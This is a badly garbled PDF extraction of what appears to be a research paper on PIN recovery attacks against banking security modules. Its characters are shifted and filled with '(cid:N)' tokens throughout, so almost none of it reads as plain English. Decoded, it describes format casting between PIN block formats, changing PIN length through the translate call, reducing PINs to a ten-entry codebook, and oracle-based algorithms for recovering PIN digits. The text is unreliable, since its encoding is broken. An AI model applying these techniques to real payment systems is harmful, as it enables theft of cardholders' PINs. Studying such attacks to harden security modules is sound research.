(cid:19)(cid:19)(cid:19)55(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)RSHUDWLRQ(cid:3) +FDQ(cid:3)EH(cid:3)ZULWWHQ(cid:3)DV +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3)3&(cid:11)$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:12)(cid:3)o$1<(cid:3)(cid:17) +3$1 3$1(cid:10)(cid:3) (cid:3)3$1(cid:3)(cid:134)55(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19) +2EVHUYH(cid:3)WKH(cid:3)SURFHVV +3%(cid:3) (cid:3) G (cid:11)(3%(cid:12)(cid:3) +(cid:11).(cid:12) +3(cid:20)(cid:10) (cid:3) 3%(cid:3)(cid:134) 3(cid:21)(cid:10)(cid:3) +(cid:3) (cid:11)3(cid:20)(cid:3)(cid:134) 3(cid:21)(cid:12)(cid:3)(cid:134) (cid:11)3(cid:21)(cid:3)(cid:134) 55(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12)(cid:3) +3(cid:20)(cid:3)(cid:134) (cid:19)(cid:19)(cid:19)(cid:19)55(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:3) +3(cid:10) (cid:3) 3(cid:3)(cid:134) (cid:19)(cid:19)55(cid:3) +3(cid:10)(cid:3)LV(cid:3)WKHQ(cid:3)IRUPDWWHG(cid:3)LQWR(cid:3)3%(cid:10)(cid:3)DQG(cid:3)HQFU\SWHG(cid:3)WR(cid:3)\LHOG(cid:3)(3%(cid:10)(cid:17)(cid:3)7KLV(cid:3)FDOO(cid:3)LV(cid:3)VXFFHVVIXO(cid:3)SURYLGHG(cid:3)WKDW(cid:3)3(cid:21)(cid:10)(cid:3)DQG(cid:3) +3(cid:20)(cid:10)(cid:3)DUH(cid:3)GHHPHG(cid:3)WR(cid:3)EH(cid:3)YDOLG(cid:17) +([DPSOH(cid:29) +3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:20)(cid:21)(cid:22)(cid:23) +3$1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20) +&OHDU(cid:3)3,1(cid:3)%ORFN(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:23)(cid:20)(cid:21)(cid:22)(cid:24)’&%$(cid:28)(cid:27)(cid:26)(cid:25))( +3,1(cid:3)HQF(cid:3)NH\(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24) +(QFU\SWHG(cid:3)3,1(cid:3)%ORFN(cid:3)(cid:3)’&(cid:25)(cid:26)(cid:23)(cid:19)(cid:21)(cid:28)%(cid:23)(cid:26)(cid:25)(cid:25)(cid:25)&(cid:22) +,Q(cid:3)WKH(cid:3)WUDQVODWH(cid:3)FDOO(cid:15)(cid:3)ZH(cid:3)SURYLGH(cid:3)3$1(cid:10)(cid:3)(cid:11)DV(cid:3)RSSRVHG(cid:3)WR(cid:3)WKH(cid:3)(cid:10)FRUUHFW(cid:10)(cid:3)3$1(cid:12) +3$1(cid:10) (cid:20)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20)(cid:3)(cid:11)3$1(cid:10)(cid:3) (cid:3)3$1(cid:3)(cid:134) (cid:20)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12) +&OHDU(cid:3)3,1(cid:3)%/2&.(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:23)(cid:20)(cid:21)(cid:22)(cid:24)’&%$(cid:28)(cid:27)(cid:26)(cid:25))( +([WUDFWHG(cid:3)3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:20)(cid:21)(cid:21)(cid:23)(cid:3)(cid:11) (cid:3)3,1(cid:3)(cid:134) (cid:19)(cid:19)(cid:20)(cid:19)(cid:12) ++HQFH(cid:3)ZH(cid:3)KDYH(cid:3)VXFFHHGHG(cid:3)LQ(cid:3)PRGLI\LQJ(cid:3)WKH(cid:3)3,1(cid:17) +’HILQLWLRQ +)RUPDW(cid:3)&DVWLQJ (cid:11))&(cid:12)(cid:3)LV(cid:3)WKH(cid:3)SURFHVV(cid:3)RI(cid:3)LQWHUSUHWLQJ(cid:3)D(cid:3)3,1(cid:3)EORFN(cid:3)RI(cid:3)D(cid:3)JLYHQ(cid:3)IRUPDW(cid:3)(cid:11)FDOOHG(cid:3)WKH(cid:3)VRXUFH +IRUPDW(cid:12)(cid:3)DV(cid:3)D(cid:3)3,1(cid:3)EORFN(cid:3)RI(cid:3)DFKRVHQ(cid:3)IRUPDW(cid:3)(cid:11)FDOOHG(cid:3)WKH(cid:3)DSSOLHG IRUPDW(cid:12)(cid:17) +(cid:24) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +$JDLQ(cid:15)(cid:3)WKLV(cid:3)RSHUDWLRQ(cid:3)UHPDLQV(cid:3)DFKLHYDEOH(cid:3)HYHQ(cid:3)ZKHQ(cid:3)UHVWULFWHG(cid:3)WR(cid:3)ZRUNLQJ(cid:3)ZLWK(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFNV(cid:15)(cid:3) +WKURXJK(cid:3)WKH(cid:3)XVH(cid:3)RI(cid:3)WKH(cid:3)WUDQVODWH(cid:3)IXQFWLRQ(cid:17)(cid:3)(cid:3)*LYHQ(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)RI(cid:3)VRXUFHIRUPDW(cid:15)(cid:3)VXSSO\(cid:3)LW(cid:3)WR(cid:3) +WKH(cid:3)UHIRUPDW(cid:3)FDOO(cid:15)(cid:3)VSHFLI\LQJ(cid:3)WKH(cid:3)DSSOLHG IRUPDW(cid:3)DV(cid:3)WKH(cid:3)LQSXW(cid:3)IRUPDW(cid:3)RI(cid:3)WKLV(cid:3)3,1(cid:3)DQG(cid:3)VHOHFWLQJ(cid:3)D(cid:3) +VXLWDEOH(cid:3)RXWSXW(cid:3)IRUPDW(cid:3)(cid:11)FDOOHG(cid:3)WKH(cid:3)WDUJHWIRUPDW(cid:12)(cid:17)(cid:3)(cid:3):H(cid:3)GHQRWH(cid:3)WKH(cid:3)RSHUDWLRQ(cid:3)DV +6RXUFH(cid:3))RUPDW(cid:3)(cid:29)(cid:3))&(cid:3)(cid:11)$SSOLHG(cid:3))RUPDW(cid:12)(cid:3)o 7DUJHW(cid:3))RUPDW +7KH(cid:3) LPSOHPHQWDWLRQ(cid:3) PD\(cid:3) IDLO(cid:3) WKH(cid:3) FDOO(cid:3) LI(cid:3) WKH(cid:3) VRXUFH(cid:3) IRUPDW(cid:3) 3,1(cid:3) EORFN(cid:3) FDQQRW(cid:3) EH(cid:3) VXFFHVVIXOO\(cid:3) +LQWHUSUHWHG(cid:3)DV(cid:3)D(cid:3)3,1(cid:3)EORFN(cid:3)RI(cid:3)DSSOLHG(cid:3)IRUPDW(cid:15)(cid:3)DFFRUGLQJ(cid:3)WR(cid:3)WKH(cid:3)UXOHV(cid:3)RI(cid:3)WKH(cid:3)LPSOHPHQWDWLRQ(cid:17)(cid:3)(cid:3)7KLV(cid:3) +RSHUDWLRQ(cid:3)FDQ(cid:3)EH(cid:3)XVHG(cid:3)LQ(cid:3)D(cid:3)YDULHW\(cid:3)RI(cid:3)XVHIXO(cid:3)ZD\V(cid:3)WR(cid:3)PDQLSXODWH(cid:3)WKH(cid:3)3,1(cid:17)(cid:3)(cid:3)3HUKDSV(cid:3)WKH(cid:3)PRVW(cid:3)SRZHUIXO(cid:3) +DSSOLFDWLRQ(cid:3)RI(cid:3)WKLV(cid:3)WHFKQLTXH(cid:3)LV(cid:3)LQ(cid:3)WKH(cid:3)PRGLILFDWLRQ(cid:3)RI(cid:3)WKH(cid:3)OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)(cid:11)ERWK(cid:3)WR(cid:3)H[WHQG(cid:3)DQG(cid:3) +UHGXFH(cid:12)(cid:17)(cid:3)(cid:3):H(cid:3)GHPRQVWUDWH(cid:3)LW(cid:10)V(cid:3)XVH(cid:3)LQ(cid:3)H[WHQGLQJ(cid:3)WKH(cid:3)OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:17) +(cid:23)(cid:17)(cid:22)(cid:17) 0RGLI\LQJ(cid:3)WKH(cid:3)OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1 +2XU(cid:3)LQWHQWLRQ(cid:3)KHUH(cid:3)LV(cid:3)WR(cid:3)REWDLQ(cid:3)D(cid:3)QHZ(cid:3)(3%(cid:10)(cid:15)(cid:3)ZLWK(cid:3)D(cid:3)PRGLILHG(cid:3)3,1(cid:3)(cid:11)3(cid:10)(cid:3) (cid:3)(cid:19)/3333(cid:12)(cid:17)(cid:3)(cid:3):H(cid:3)SHUIRUP(cid:3)WKH(cid:3) +IROORZLQJ(cid:3)RSHUDWLRQ +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3))&(cid:11)9,6$(cid:16)(cid:22)(cid:12)(cid:3)o $16,(cid:3);(cid:28)(cid:17)(cid:27) +3$1 (cid:19) 3$1(cid:3) (cid:3)(cid:19) +7KH(cid:3)LPSOHPHQWDWLRQ(cid:3)SHUIRUPV(cid:3)WKH(cid:3)IROORZLQJ(cid:3)VWHSV(cid:29) +3%(cid:3) G (cid:11)(3%(cid:12)(cid:3) +(cid:11).(cid:12) +(cid:3) (cid:19)/3333))))))))))(cid:3)(cid:134) 3(cid:21)(cid:3) +(cid:3) (cid:19)/3333)))))))))) +$V(cid:3)D(cid:3)9,6$(cid:16)(cid:22)(cid:3)IRUPDW(cid:3)3,1(cid:15)(cid:3)WKH(cid:3)3,1(cid:3)LV(cid:3)H[WUDFWHG(cid:3)DV +3(cid:10)(cid:3) (cid:3) (cid:19)/3333 +DQG(cid:3)UHIRUPDWWHG(cid:3)WR +3%(cid:10)(cid:3) (cid:3) (cid:19)/(cid:10)(cid:19)/3333))))))))(cid:3)(cid:134) 3(cid:21)(cid:10) +ZKHUH(cid:3)3(cid:21)(cid:10)(cid:3)LV(cid:3)WKH(cid:3)RXWSXW(cid:3)SDQ(cid:3)VSHFLILHG(cid:17)(cid:3)1RWH(cid:3)WKDW(cid:3)/(cid:10)(cid:3) (cid:3)/(cid:14)(cid:21)(cid:17)(cid:3)(cid:3)7KLV(cid:3)FDOO(cid:3)ZLOO(cid:3)VXFFHHG(cid:3)SURYLGHG(cid:3)3(cid:10)(cid:3)LV(cid:3)GHHPHG(cid:3) +WR(cid:3)EH(cid:3)YDOLG(cid:17) +(cid:24)(cid:17) ([WHQGLQJ(cid:3).QRZQ(cid:3)$WWDFNV +(cid:24)(cid:17)(cid:20)(cid:17) 7KH(cid:3)&RGH(cid:3)%RRN(cid:3)DQG(cid:3)([KDXVWLYH(cid:3)6HDUFK(cid:3)5HYLVLWHG +7KH(cid:3)DELOLW\(cid:3)WR(cid:3)PRGLI\(cid:3)3,1(cid:3)OHQJWK(cid:3)KDV(cid:3)LPPHGLDWH(cid:3)DQG(cid:3)GUDPDWLF(cid:3)UDPLILFDWLRQV(cid:3)VLQFH(cid:3)LW(cid:3)DOORZV(cid:3)XV(cid:3)WR(cid:3)JUHDWO\(cid:3) +UHGXFH(cid:3)WKH(cid:3)GDWD(cid:3)FROOHFWLRQ(cid:3)DQG(cid:3)VHDUFK(cid:3)HIIRUW(cid:17)(cid:3)(cid:3)8VLQJ(cid:3)YDULDWLRQV(cid:3)RQ(cid:3)WKH(cid:3)WHFKQLTXHV(cid:3)GHVFULEHG(cid:15)(cid:3)LW(cid:3)LV(cid:3) +SRVVLEOH(cid:3)WR(cid:3)UHGXFH(cid:3)WKH(cid:3)3,1(cid:3)VSDFH(cid:17)(cid:3)(cid:3))RU(cid:3)H[DPSOH(cid:15)(cid:3)XVLQJ +9,6$(cid:16)(cid:22)(cid:3)(cid:29)(cid:3))&(cid:11)(cid:3)(&,(cid:16)(cid:21)(cid:12)(cid:3)o $1<(cid:3) +(cid:11)\LHOGLQJ(cid:3)3(cid:10)(cid:3) (cid:3)33 3 3 (cid:12) +(cid:20) (cid:21) (cid:22) (cid:23) +(cid:25) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +ZH(cid:3)FDQ(cid:3)DWWDFN(cid:3)WKH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)GLJLWV(cid:3)RI(cid:3)DQ\(cid:3)3,1(cid:3)LQGHSHQGHQWO\(cid:3)ZKLOH(cid:3) +9,6$(cid:16)(cid:22)(cid:3)(cid:29)(cid:3))&(cid:11)(cid:3),%0(cid:3)(cid:22)(cid:25)(cid:21)(cid:20)(cid:3)(cid:12)(cid:3)o$1<(cid:3) +(cid:11)\LHOGLQJ(cid:3)3(cid:10)(cid:3) (cid:3)3 3 3 3 3 3 3 3 (cid:12) +(cid:24) (cid:25) (cid:26) (cid:27) (cid:28) (cid:20)(cid:19) (cid:20)(cid:20) (cid:20)(cid:21) +DOORZV(cid:3)H[SRVHV(cid:3)WKH(cid:3)UHPDLQLQJ(cid:3)GLJLWV(cid:17)(cid:3)(cid:3):H(cid:3)FDQ(cid:3)UHSHDW(cid:3)WKH(cid:3)SURFHVV(cid:15)(cid:3)XOWLPDWHO\(cid:3)WXUQLQJ(cid:3)D(cid:3)(cid:20)(cid:21)(cid:3)GLJLW(cid:3)3,1(cid:3)LQWR(cid:3) +(cid:22)(cid:3)VHSDUDWH(cid:3)(cid:23)(cid:3)GLJLW(cid:3)3,1V(cid:17)(cid:3)7KXV(cid:15)(cid:3)UHJDUGOHVV(cid:3)RI(cid:3)OHQJWK(cid:15)(cid:3)DOO(cid:3)3,1V(cid:3)DUH(cid:3)HTXDOO\(cid:3)YXOQHUDEOH(cid:3)WR(cid:3)D(cid:3)(cid:23)(cid:3)GLJLW(cid:3)3,1(cid:3) +HOHFWURQLF(cid:3)FRGHERRN(cid:3)RU(cid:3)H[KDXVWLYH(cid:3)VHDUFK(cid:3)DWWDFN(cid:4) +*LYHQ(cid:3)WKH(cid:3)(cid:23)(cid:3)GLJLW(cid:3)3,1(cid:3)3(cid:3) (cid:3)33 3 3 (cid:17)(cid:3)(cid:3)/HW(cid:3)WKH(cid:3)VHTXHQFH6 EH(cid:3)WKH(cid:3)RSHUDWLRQV +(cid:20) (cid:21) (cid:22) (cid:23) (cid:20) +9,6$(cid:16)(cid:21)(cid:3)(cid:29)(cid:3))&(cid:11)(cid:3)9,6$(cid:16)(cid:22)(cid:3)(cid:12)(cid:3)o $1< +(cid:11)\LHOGLQJ(cid:3)3(cid:10)(cid:3) (cid:3)(cid:23)33 3 3 (cid:19)(cid:12) +(cid:20) (cid:21) (cid:22) (cid:23) +$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)(cid:29)(cid:3))&(cid:11)(cid:3),%0(cid:3)(cid:22)(cid:25)(cid:21)(cid:20)(cid:3)(cid:12)(cid:3)o $1<(cid:3) +(cid:11)\LHOGLQJ(cid:3)(cid:3)3(cid:181)(cid:3) (cid:3)3 3 3 (cid:19)(cid:12) +(cid:21) (cid:22) (cid:23) +DQG(cid:3)OHW(cid:3)VHTXHQFH(cid:3)6 EH(cid:3)WKH(cid:3)RSHUDWLRQ +(cid:21) +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3))&(cid:11)(cid:3),%0(cid:3)(cid:22)(cid:25)(cid:21)(cid:20)(cid:3)(cid:12)(cid:3)o $1<(cid:3) +(cid:11)3$1(cid:3) (cid:3)(cid:19)(cid:19)))(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12) +(cid:11)\LHOGLQJ(cid:3)3(cid:10)(cid:3) (cid:3)3 3 (cid:19)(cid:19)(cid:12) +(cid:22) (cid:23) +1RWH(cid:3)E\(cid:3)DSSO\LQJ(cid:3)6 IROORZHG(cid:3)E\(cid:3)6(cid:15)(cid:3)ZH(cid:3)REWDLQ(cid:3)3,1(cid:3)3(cid:10)(cid:3) (cid:3)3 (cid:19)(cid:19)(cid:19)(cid:17) +(cid:21) (cid:20) (cid:23) +%\(cid:3)DSSO\LQJ(cid:3)WKH(cid:3)QH[W(cid:3)RSHUDWLRQ(cid:3)WKUHH(cid:3)WLPHV(cid:3)FRQVHFXWLYHO\(cid:3)WR(cid:3)HDFK(cid:3)RI(cid:3)WKH(cid:3)3,16(cid:3)LQ(cid:3)WKH(cid:3)VHW(cid:3)^33 3 3 (cid:15)(cid:3) +(cid:20) (cid:21) (cid:22) (cid:23) +3 3 3 (cid:19)(cid:15)(cid:3)3 3 (cid:19)(cid:19)(cid:15)(cid:3)3 (cid:19)(cid:19)(cid:19)‘(cid:15)(cid:3)ZH(cid:3)REWDLQ(cid:3)WKH(cid:3)VHW(cid:3)^(cid:3)3(cid:13) (cid:3)(cid:23)(cid:23)(cid:23)3 _(cid:3)L(cid:3)(cid:143)(cid:20)(cid:17)(cid:17)(cid:23)(cid:3)‘(cid:17) +(cid:21) (cid:22) (cid:23) (cid:22) (cid:23) (cid:23) L L +9,6$(cid:16)(cid:21)(cid:3)(cid:29)(cid:3))&(cid:11)(cid:3)(&,(cid:16)(cid:21)(cid:3)(cid:12)(cid:3)o9,6$(cid:16)(cid:21)(cid:3) +(cid:11)\LHOGLQJ(cid:3)3(cid:10)(cid:3) (cid:3)(cid:23)(cid:3)33 3 (cid:12) +(cid:20) (cid:21) (cid:22) +&RPELQLQJ(cid:3)LW(cid:3)DOO(cid:15)(cid:3)ZH(cid:3)FDQ(cid:3)UHGXFH(cid:3)D(cid:3)/(cid:3)GLJLW(cid:3)3,1(cid:3)WR(cid:3)WKH(cid:3)VHW(cid:3)^3(cid:13) (cid:3)(cid:23)(cid:23)(cid:23)3 _(cid:3)L(cid:3)d /‘(cid:17)(cid:3)(cid:3)7KH(cid:3)DWWDFNHU(cid:10)V(cid:3) +L L +UHTXLUHPHQWV(cid:3)KDYH(cid:3)EHHQ(cid:3)UHGXFHG(cid:3)WR(cid:3)D(cid:3)FRGH(cid:3)ERRN(cid:3)RI(cid:3)(cid:20)(cid:19)(cid:3)NQRZQ(cid:3)(cid:23)(cid:3)GLJLW(cid:3)3,1V(cid:15)(cid:3)QDPHO\(cid:3)^3(cid:13) (cid:3)(cid:23)(cid:23)(cid:23)L(cid:3)_(cid:3)L(cid:3) (cid:3)(cid:19)(cid:17)(cid:17)(cid:28)‘(cid:15)(cid:3) +L +DQG(cid:3)DFFHVV(cid:3)WR(cid:3)WKH(cid:3)UHIRUPDW(cid:3)IXQFWLRQ(cid:3)LQ(cid:3)RUGHU(cid:3)WR(cid:3)UHFRYHU(cid:3)DQ\(cid:3)3,1(cid:4) +(cid:25)(cid:17) 2UDFOHV +(cid:25)(cid:17)(cid:20)(cid:17) ,QWURGXFWLRQ +7KLV(cid:3)VHFWLRQ(cid:3)IROORZV(cid:3)D(cid:3)VLPSOH(cid:3)VWUDWHJ\(cid:17)(cid:3):H(cid:3)GHILQH(cid:3)DQ(cid:3)RUDFOH(cid:3)DQG(cid:3)LQYHVWLJDWH(cid:3)WKH(cid:3)SURSHUWLHV(cid:3)WKHUHRI(cid:15)(cid:3) +GHVFULELQJ(cid:3)KRZ(cid:3)WKH(cid:3)RUDFOH(cid:3)FRXOG(cid:3)EH(cid:3)XVHG(cid:3)WR(cid:3)LGHQWLI\(cid:3)D(cid:3)¶QXPEHU•(cid:3)DQG(cid:3)DQ(cid:3)DOJRULWKP(cid:3)WR(cid:3)GR(cid:3)VR(cid:17)(cid:3)(cid:3):H(cid:3)WKHQ(cid:3) +VKRZ(cid:3)KRZ(cid:3)WR(cid:3)LQVWDQWLDWH(cid:3)VXFK(cid:3)DQ(cid:3)RUDFOH(cid:3)XVLQJ(cid:3)VWDQGDUG(cid:3)3,1(cid:3)IXQFWLRQV(cid:15)(cid:3)XOWLPDWHO\(cid:3)\LHOGLQJ(cid:3)D(cid:3)PHWKRG(cid:3)WR(cid:3) +UHFRYHU(cid:3)WKH(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)(cid:11)L(cid:17)H(cid:17)(cid:3)D(cid:3)3,1(cid:3)UHFRYHU\(cid:3)DWWDFN(cid:12)(cid:17) +(cid:25)(cid:17)(cid:21)(cid:17) 7KHRU\ +:H(cid:3)EHJLQ(cid:3)E\(cid:3)GHILQLQJ(cid:3)WKUHH(cid:3)XVHIXO(cid:3)RUDFOHV(cid:17)(cid:3)(cid:3))RU(cid:3)[(cid:15)(cid:3)D(cid:15)(cid:3)E(cid:15)(cid:3)(cid:3)Q(cid:3)(cid:143)=(cid:3)(cid:11)D(cid:3)XQNQRZQ(cid:12)(cid:17) +’HILQLWLRQ +(cid:26) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +*LYHQ(cid:3)D(cid:3)TXHU\(cid:3)[(cid:15)(cid:3)RUDFOH(cid:3)J UHWXUQV(cid:3)WUXHLI(cid:3)D(cid:3)(cid:134) [(cid:3) (cid:3)Q(cid:15)(cid:3)HOVH(cid:3)IDOVH(cid:17) +(cid:11)D(cid:15)Q(cid:12) +’HILQLWLRQ +*LYHQ(cid:3)D(cid:3)TXHU\(cid:3)[(cid:15)(cid:3)RUDFOH(cid:3)K UHWXUQV(cid:3)WUXHLI(cid:3)D(cid:3)(cid:134) [(cid:3)(cid:31)(cid:3)Q(cid:15)(cid:3)HOVH(cid:3)IDOVH(cid:17) +(cid:11)D(cid:15)Q(cid:12) +’HILQLWLRQ +2UDFOH(cid:3)O UHWXUQV(cid:3)WUXHLI(cid:3)D(cid:3) (cid:3)E(cid:15)(cid:3)HOVH(cid:3)IDOVH(cid:17) +(cid:11)D(cid:15)E(cid:12) +/HPPD +*LYHQ(cid:3)[(cid:15)(cid:3)Q(cid:3)(cid:143)=(cid:15)(cid:3)(cid:11)Q(cid:3)HYHQ(cid:12)(cid:15)(cid:3)WKHQ(cid:3)[(cid:3)(cid:134) (cid:20)(cid:3)(cid:31)(cid:3)Q(cid:3)LII(cid:3)[(cid:3)(cid:31)(cid:3)Q(cid:17) +7KHRUHP +*LYHQ(cid:3)D(cid:15)(cid:3)Q(cid:3)(cid:143)=(cid:15)(cid:3)(cid:11)D(cid:3)XQNQRZQ(cid:15)(cid:3)D(cid:3)(cid:31)(cid:3)Q(cid:12)(cid:17)(cid:3) +(cid:20)(cid:17) ,W(cid:3)LV(cid:3)SRVVLEOH(cid:3)WR(cid:3)XQLTXHO\(cid:3)LGHQWLI\(cid:3)D(cid:3)E\(cid:3)TXHU\LQJ(cid:3)RUDFOH(cid:3)J (cid:17)(cid:3) +(cid:11)D(cid:15)(cid:3)Q(cid:12) +(cid:21)(cid:17) ,I(cid:3)Q(cid:3)LV(cid:3)HYHQ(cid:15)(cid:3)LW(cid:3)LV(cid:3)QRW(cid:3)SRVVLEOH(cid:3)WR(cid:3)VXSSO\(cid:3)D(cid:3)TXHU\(cid:3)[(cid:3)(cid:143) =(cid:3)WR(cid:3)RUDFOH(cid:3)K ZKLFK(cid:3)FDQ(cid:3)GLVWLQJXLVK(cid:3)EHWZHHQ(cid:3) +(cid:11)D(cid:15)(cid:3)Q(cid:12) +D(cid:3)DQG(cid:3)D(cid:3)(cid:134) (cid:20)(cid:17) +(cid:22)(cid:17) ,I(cid:3)Q(cid:3)LV(cid:3)HYHQ(cid:15)Q(cid:18)(cid:21) RGG(cid:15)(cid:3)LW(cid:3)LV(cid:3)SRVVLEOH(cid:3)WR(cid:3)LGHQWLI\(cid:3)D(cid:3)DV(cid:3)HLWKHU(cid:3)D(cid:3)RU(cid:3)D(cid:3)(cid:134) (cid:20)(cid:3)E\(cid:3)TXHU\LQJ(cid:3)RUDFOH(cid:3)K (cid:17) +(cid:11)D(cid:15)(cid:3)Q(cid:12) +7KHVH(cid:3)OHDG(cid:3)WR(cid:3)REYLRXV(cid:3)DOJRULWKPV(cid:3)IRU(cid:3)LGHQWLI\LQJ(cid:3)D(cid:17) +$OJRULWKP(cid:29)(cid:3)8VLQJ(cid:3)J WR(cid:3)UHFRYHU(cid:3)^D(cid:15)(cid:3)D(cid:3)(cid:134) (cid:20)‘ +(cid:11)D(cid:15)Q(cid:12) +(cid:20)(cid:17) )RU(cid:3)HDFK(cid:3)SRVVLEOH(cid:3)YDOXH(cid:3)RI(cid:3)D(cid:15)(cid:3)L(cid:3)(cid:143)= +L Q +(cid:20)(cid:17)(cid:20)(cid:17) &DOFXODWH(cid:3)[(cid:3) (cid:3)D (cid:134) (cid:11)Q(cid:16)(cid:20)(cid:12)(cid:17) +L +(cid:20)(cid:17)(cid:21)(cid:17) 5HWXUQ(cid:3)D LII(cid:3)J (cid:11)[(cid:12)(cid:3) (cid:3)WUXH(cid:17) +L (cid:11)D(cid:15)(cid:3)Q(cid:12) +$OJRULWKP(cid:29)(cid:3)8VLQJ(cid:3)K WR(cid:3)UHFRYHU(cid:3)^D(cid:15)(cid:3)D(cid:3)(cid:134) (cid:20)‘ +(cid:11)D(cid:15)Q(cid:12) +(cid:20)(cid:17) )RU(cid:3)HDFK(cid:3)SRVVLEOH(cid:3)YDOXH(cid:3)RI(cid:3)D(cid:15)(cid:3)L(cid:3)(cid:143)= +L Q +(cid:20)(cid:17)(cid:20)(cid:17) &DOFXODWH(cid:3)[ (cid:3)D (cid:134) (cid:11)Q(cid:16)(cid:20)(cid:12)(cid:3)DQG(cid:3)[ (cid:3)D (cid:134) Q(cid:17) +(cid:20) L (cid:21) L +(cid:20)(cid:17)(cid:21)(cid:17) 6XEPLW(cid:3)[(cid:15)(cid:3)[ WR(cid:3)K +(cid:20) (cid:21) (cid:11)D(cid:15)Q(cid:12) +(cid:20)(cid:17)(cid:22)(cid:17) 5HWXUQ(cid:3)^D(cid:15)(cid:3)D (cid:134) (cid:20)‘(cid:3)LII(cid:3)K (cid:11)[(cid:12)(cid:3) (cid:3)WUXHDQG(cid:3)K (cid:11)(cid:3)[ (cid:12) (cid:3)IDOVH(cid:17) +L L (cid:11)D(cid:15)Q(cid:12) (cid:20) (cid:11)D(cid:15)Q(cid:12) (cid:21) +)RU(cid:3)Q(cid:3) (cid:3)(cid:20)(cid:19)(cid:15)(cid:3)WKHUH(cid:3)LV(cid:3)D(cid:3)PRUH(cid:3)HIILFLHQW(cid:3)DOJRULWKP(cid:3)XVLQJ(cid:3)K (cid:17) +(cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) +$OJRULWKP(cid:29)(cid:3)(IILFLHQW(cid:3)DOJRULWKP(cid:3)IRU(cid:3)LGHQWLI\LQJ(cid:3)^D(cid:15)(cid:3)D(cid:3)(cid:134) (cid:20)‘(cid:3)XVLQJ(cid:3)K (cid:15)(cid:3)D(cid:3)(cid:31)(cid:3)(cid:20)(cid:19) +(cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) +)RU(cid:3)D(cid:3)(cid:143)^(cid:19)(cid:15)(cid:20)(cid:15)(cid:21)(cid:15)(cid:22)(cid:15)(cid:23)(cid:15)(cid:24)(cid:15)(cid:25)(cid:15)(cid:26)(cid:15)(cid:27)(cid:15)(cid:28)‘(cid:15)(cid:3)QRWLFH(cid:3)D(cid:3)(cid:134) (cid:27)(cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:3)IRU(cid:3)D(cid:3)(cid:143)^(cid:19)(cid:15)(cid:20)(cid:15)(cid:27)(cid:15)(cid:28)‘(cid:15)(cid:3)ZKLOH(cid:3)D(cid:3)(cid:143)^(cid:21)(cid:15)(cid:22)(cid:15)(cid:23)(cid:15)(cid:24)(cid:15)(cid:25)(cid:15)(cid:26)‘(cid:3)ZLOO(cid:3)IDLO(cid:3)K (cid:17)(cid:3)(cid:3) +(cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) +(cid:20)(cid:17) 4XHU\(cid:3)K (cid:11)(cid:27)(cid:12)(cid:17)(cid:3) +(cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) +(cid:20)(cid:17)(cid:20)(cid:17) ,I(cid:3)D(cid:3)(cid:143) ^(cid:19)(cid:15)(cid:20)(cid:15)(cid:27)(cid:15)(cid:28)‘(cid:15)(cid:3)D(cid:3)(cid:134) (cid:23)(cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:3)IRU(cid:3)D(cid:3)(cid:143) ^(cid:19)(cid:15)(cid:20)‘(cid:17)(cid:3)(cid:3)+HQFH(cid:3)TXHU\(cid:3)K 